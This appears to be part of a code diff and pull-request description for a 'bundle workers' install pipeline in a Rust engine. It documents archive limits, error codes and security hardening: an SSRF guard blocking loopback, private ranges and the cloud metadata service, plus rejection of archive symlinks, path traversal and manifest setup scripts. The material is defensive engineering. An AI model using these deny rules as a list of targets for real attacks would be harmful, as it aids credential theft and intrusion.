+| Total uncompressed size     | 64 MiB             |
+| Largest single file         | 32 MiB             |
+| Maximum entry count         | 1024               |
+| Maximum directory depth     | 16                 |
+| Allowed tar entry types     | Regular, Directory |
+
+Archives containing symlinks, hard links, character devices, FIFOs, or paths with `..`
+components are rejected with `W181 BundleArchiveUnsafe`.
+
+### Error codes
+
+| Code   | Failure                                                                                            |
+|--------|----------------------------------------------------------------------------------------------------|
+| `W142` | Archive download failed (HTTP error, unexpected content-type, size cap, sha256 mismatch).          |
+| `W180` | Manifest rejected (forbidden field like `scripts.setup` or `runtime.base_image`).                  |
+| `W181` | Archive contains unsafe entries (symlink, hardlink, traversal, oversized, too many entries).       |
+| `W182` | Resource request exceeded engine cap; install proceeded with clamped values (warn, not fail).      |
+| `W183` | Dependency graph too wide or too deep (max depth 5, max transitive count 32).                      |
+
+{/* TODO: document the publish flow (`iii worker publish bundle.tar.gz`?), the registry's
+storage layout, and the recommended bundler configurations for Node/Bun/Python. */}

--- a/engine/src/workers/config.rs
+++ b/engine/src/workers/config.rs
@@ -77,6 +77,13 @@ impl EngineConfig {
 
     /// Loads config strictly from the given file path.
     /// Returns a clear error if the file does not exist or cannot be parsed.
+    ///
+    /// This function is called from BOTH engine startup
+    /// (`run_serve`) AND the async reload path
+    /// (`workers::reload::ReloadManager::parse_and_normalize`). It must
+    /// therefore not mutate process-global env state, because
+    /// `std::env::set_var` while tokio workers are running is undefined
+    /// behavior on multiple platforms.
     pub fn config_file(path: &str) -> anyhow::Result<Self> {
         let yaml_content = std::fs::read_to_string(path).map_err(|e| {
             if e.kind() == std::io::ErrorKind::NotFound {


### PR DESCRIPTION
## Summary

Adds `iii worker add <name>` for registry-served **bundle workers** — tar.gz archives containing a packaged local-worker directory that the engine downloads (HTTPS + SHA-256), extracts into `~/.iii/workers-bundle/{name}/`, and dispatches through the existing libkrun rails.

- **Install pipeline:** per-worker fslock → streamed download with content-type whitelist + size cap + SSRF guard (HTTPS-only; loopback / link-local / RFC-1918 / RFC-6598 / IMDS rejected; **per-redirect re-validation** with a 5-hop cap) → tight tar extractor (Regular + Directory only; reject Symlink/Hardlink/Char/Block/Fifo; cap entries / single-file / total / depth; strip setuid/setgid) → strict manifest validation (rejects `scripts.setup`, `scripts.install`, `runtime.base_image`; **64 KiB cap** on the manifest itself for billion-laughs defense) → atomic stage→final rename (cross-fs falls back to copy via sibling `.partial.<ts>.<n>`) → config.yaml entry.
- **Cache:** `~/.iii/cache/bundles/<sha256>.tar.gz` with LRU eviction; cache hits re-hash the copied blob in staging before trusting it (closes TOCTOU between lookup and copy).
- **Engine gates (env-var-only for now):** `III_BUNDLE_WORKERS_DISABLED=1` refuses install + start; `III_BUNDLE_DEV_LOOPBACK=1` enables the localhost SSRF bypass for the local fixture server (mirrors OCI `III_INSECURE_REGISTRIES`).
- **Boot-time defense:** `start_bundle_worker` re-runs `validate_bundle_manifest` before `load_project_info` to defeat post-install manifest tampering; resources re-clamped on every boot.
- **W-codes:** W180 BundleManifestRejected · W181 BundleArchiveUnsafe · W182 BundleResourceClamped · W183 BundleDepGraphExceeded.

## Test plan

- [x] `cargo test -p iii-worker --lib` → **714 passed, 0 failed, 1 ignored**
- [x] `cargo test -p iii-worker --test bundle_worker_integration` → **45 passed, 0 failed** (32 baseline + 13 new regression tests covering env-var gates, lock-file preservation, sweep_orphans lock-held protection, atomic_install concurrent race, MAX_BUNDLE_DEPTH/ENTRIES boundary acceptance, Fifo/Block entry rejection, dir-then-file collision, manifest 64 KiB cap)
- [x] `cargo fmt --check` → clean on iii-worker + engine
- [x] `cargo check -p iii-worker --tests` → 0 errors
- [ ] **E2E** (`tmp/bundle-worker-test/e2e/run-e2e.sh`) — script updated to export `III_BUNDLE_DEV_LOOPBACK=1` before the install step. Reviewer should run locally once to confirm libkrun boot still succeeds with the new gates.
- [ ] **Manual sanity:** install + start a bundle worker against a real registry CDN once it exists; confirm the SSRF redirect-policy doesn't break legitimate pre-signed URLs.
- [ ] **Operator dry-run:** verify `III_BUNDLE_WORKERS_DISABLED=1 iii-worker add foo` returns a clean refusal before any network I/O.

## Notes for reviewers

- The commit subject covers the **install pipeline**; security hardening was applied as part of a pre-landing review pass (SSRF redirect bypass, unconditional dev loopback, missing config gate, YAML billion-laughs, cache TOCTOU, boot-time tampering, path-collision via leading-dot worker names, lock-file race on removal). Each fix lands with a regression test.
- `EngineConfig` does **not** yet carry a `bundle_workers_enabled` field — the env-var kill switch is the operator gate today. Adding the config-file path is a follow-up.
- Per-worker fslock files under `~/.iii/workers-bundle/.locks/` are intentionally **not** unlinked by `delete_worker_artifacts` (rationale in the commit body and the inline comment); they're tiny and unlinking them races concurrent installers.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Bundle workers: add/install/start/list/remove from signed tar.gz bundles with SSRF-safe downloads, safe extraction limits, strict manifest validation, resource clamping, per-bundle locking, atomic installs, cache with LRU eviction, and CLI/startup support for bundle-run workers.

* **Bug Fixes / Maintenance**
  * Startup sweeps stale staging, preserves lockfiles during cleanup, improves cache recency handling, and tightens worker name validation (rejects leading dot).

* **Tests**
  * Extensive unit/integration tests for extraction safety, manifest/resource validation, caching, atomic installs, orphan cleanup, concurrency and dep-graph bounds.

* **Documentation**
  * Added bundle workers docs: manifest contract, extraction constraints, and error codes.

<!-- review_stack_entry_start -->

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/iii-hq/iii/pull/1674?utm_source=github_walkthrough&utm_medium=github&utm_campaign=change_stack)

<!-- review_stack_entry_end -->
<!-- end of auto-generated comment: release notes by coderabbit.ai -->